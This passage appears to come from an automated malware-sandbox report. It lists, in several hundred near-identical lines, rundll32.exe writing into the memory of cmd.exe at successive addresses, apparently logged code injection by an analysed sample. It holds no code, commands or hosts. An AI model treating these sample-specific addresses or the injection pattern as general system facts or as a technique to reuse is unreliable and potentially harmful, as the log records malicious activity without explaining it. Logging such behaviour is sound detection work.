Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D27C0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D27C6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D280A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2847
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D284D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D28A0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D28A6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D28EA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D290D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2913
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2980
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2986
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D29CA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D29E9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A09
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A0F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A78
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A7E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2ACF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2AF2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2AF8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2B62
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2B68
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BAC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BC0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BCE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BF3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2BF9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2C3B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2C65
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2C6B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2CAF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2CD2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2CD8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2D41
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2D47
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2D8B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2DAE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2DB4
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2DF5
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E20
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E26
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E6A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E8D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2E93
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2EFD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F03
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F47
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F6A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2F70
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2FB4
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2FD5
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2FDB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3044
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D304A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3098
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D30AC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D30B3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D30B8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D30C3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D30CC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D30E7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D30ED
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3131
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3154
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D315A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D319C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D31B7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D31BD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3201
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3224
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D322A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D326C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3287
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D328D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D32E4
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D32EA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D332C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3347
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D334D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3399
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D339F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D33F0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D33F4
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D33F8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D33FC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3400
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3404
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3408
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D340C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3410
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D34A7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D34AD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3501
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D356A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D35D2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D35E6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3607
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3613
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3630
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D36A9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D36FD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3704
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3715
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3723
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D372A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D37F9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3856
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D38EA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D394A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D39D6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A13
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A1A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A40
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A46
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A52
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A77
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A8D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3A97
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3AB9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3ACD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3AD8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B07
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B10
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B3A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3B74
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3C1F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3C5A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3D6C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3DAE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3DB8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3E9C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3F9F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D3FAE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4077
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D407D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4168
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D418E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D419A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D41B6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4260
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D42C8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D42F8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4300
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D432B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4333
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4369
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D43AB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D43E1
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D43FA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4400
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D443A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D45E0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4637
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D481B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D48C5
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D48CC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D48F7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4A6A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B21
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B28
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B5A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4B8B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4D46
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4D90
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DCF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DDC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DE3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4DFB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4E6D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4EB9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4EC6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4ECD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4EE4
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F31
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F49
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F7E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D4F90
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D508A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5099
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D50A0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5135
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D517A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5197
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D51E3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D51EE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5266
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D529B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D52AE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D52EA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D52F5
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D532A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D53E7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5580
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5587
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D55EE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D55F5
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5616
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D561D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5678
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D567F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D56E3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D56F8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5747
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5759
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D57FD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5818
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D58D7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D58DE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D58F9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5905
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5913
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5969
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5981
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D598C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5993
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D59B3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5A22
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5A6A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5B33
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5BD2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5BEB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5BF2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C0B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C40
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C71
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5C78
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5E3F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FA2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FA9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FC9
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D5FD0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6137
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6194
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D61A1
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6200
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6207
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6225
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D622C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6267
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D62E3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6358
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D635F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D63DD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D63E4
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D640A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6411
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D644A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D64FD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D65A1
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D65A8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D66B8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D66BF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D66DA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D66E7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D66EE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D66FD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6724
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D6798
